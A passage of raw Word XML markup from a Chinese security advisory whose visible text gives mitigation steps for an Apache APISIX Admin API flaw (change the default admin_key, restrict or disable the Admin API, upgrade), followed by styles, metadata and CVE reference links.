                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admin_key</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，禁止使用默认</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF2F764" w14:textId="77777777" w:rsidR="003741A0" w:rsidRPr="003741A0" w:rsidRDefault="003741A0" w:rsidP="003741A0">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>若非必要，关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache APISIX Admin API</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能，或者增加</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问限制。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028890D4" w14:textId="3FD78872" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0" w:rsidP="00084E4A">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>升级</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache APISIX </w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>至最新版本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AB57F65" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRPr="00AC3E9B" w:rsidRDefault="00AC3E9B" w:rsidP="00AC3E9B"/>
    <w:sectPr w:rsidR="00AC3E9B" w:rsidRPr="00AC3E9B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DDC1A" w14:textId="77777777" w:rsidR="0029232E" w:rsidRDefault="0029232E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="46B1E65D" w14:textId="77777777" w:rsidR="0029232E" w:rsidRDefault="0029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38878" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a3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90F7E" wp14:editId="1264359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862AE" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="a3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90F7E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6862AE" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="a3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01835" w14:textId="77777777" w:rsidR="0029232E" w:rsidRDefault="0029232E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="300C7687" w14:textId="77777777" w:rsidR="0029232E" w:rsidRDefault="00292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DEF93" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7C028FB2" wp14:editId="094FA066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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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202770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D969B9"/>
    <w:rsid w:val="000441BC"/>
    <w:rsid w:val="00062751"/>
    <w:rsid w:val="000E0917"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="00171E0A"/>
    <w:rsid w:val="0017515D"/>
    <w:rsid w:val="00186490"/>
    <w:rsid w:val="001D104F"/>
    <w:rsid w:val="001D24A5"/>
    <w:rsid w:val="002147BF"/>
    <w:rsid w:val="0022644F"/>
    <w:rsid w:val="0029232E"/>
    <w:rsid w:val="003741A0"/>
    <w:rsid w:val="003A1534"/>
    <w:rsid w:val="003F570E"/>
    <w:rsid w:val="00460F73"/>
    <w:rsid w:val="004742FA"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004D02C4"/>
    <w:rsid w:val="004F1502"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="00550A89"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006907F1"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="0069604C"/>
    <w:rsid w:val="006B763B"/>
    <w:rsid w:val="00730CDF"/>
    <w:rsid w:val="0075516F"/>
    <w:rsid w:val="007A3E04"/>
    <w:rsid w:val="007B280E"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008C38D2"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00934008"/>
    <w:rsid w:val="00997C89"/>
    <w:rsid w:val="009A1299"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AC3E9B"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B40856"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B641D2"/>
    <w:rsid w:val="00B7287A"/>
    <w:rsid w:val="00BC1458"/>
    <w:rsid w:val="00BD224F"/>
    <w:rsid w:val="00C96AD0"/>
    <w:rsid w:val="00CB41B8"/>
    <w:rsid w:val="00D91C9D"/>
    <w:rsid w:val="00DB2038"/>
    <w:rsid w:val="00DD3D7D"/>
    <w:rsid w:val="00DE2C39"/>
    <w:rsid w:val="00E333CF"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E4305C"/>
    <w:rsid w:val="00E979AF"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00EE1B48"/>
    <w:rsid w:val="00EE296D"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F35D50"/>
    <w:rsid w:val="00F659CD"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="00FE1C0F"/>
    <w:rsid w:val="00FE7E79"/>
    <w:rsid w:val="00FF4132"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78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32B6A7"/>
  <w15:docId w15:val="{476657A3-E9A6-4AD2-9A57-1287C59E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rsid w:val="00B641D2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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="3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21">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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Pr>
      <w:b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A7">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat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rsid w:val="00E979AF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2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E979A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rsid w:val="0093400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934008"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D02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rsid w:val="00F35D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nvd.nist.gov/vuln/detail/CVE-2020-1394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p.weixin.qq.com/s/sRcP27-y_Ps-YGTZ3Y4uZ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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-884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p.weixin.qq.com/s/QnAyz8t1LGBsgTpexUNlw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2042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forever lazy</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-06T05:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27T19:48:00Z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F961DC4C1D9B460CAB021EA163E041CB</vt:lpwstr>
  </property>
</Properties>
</file>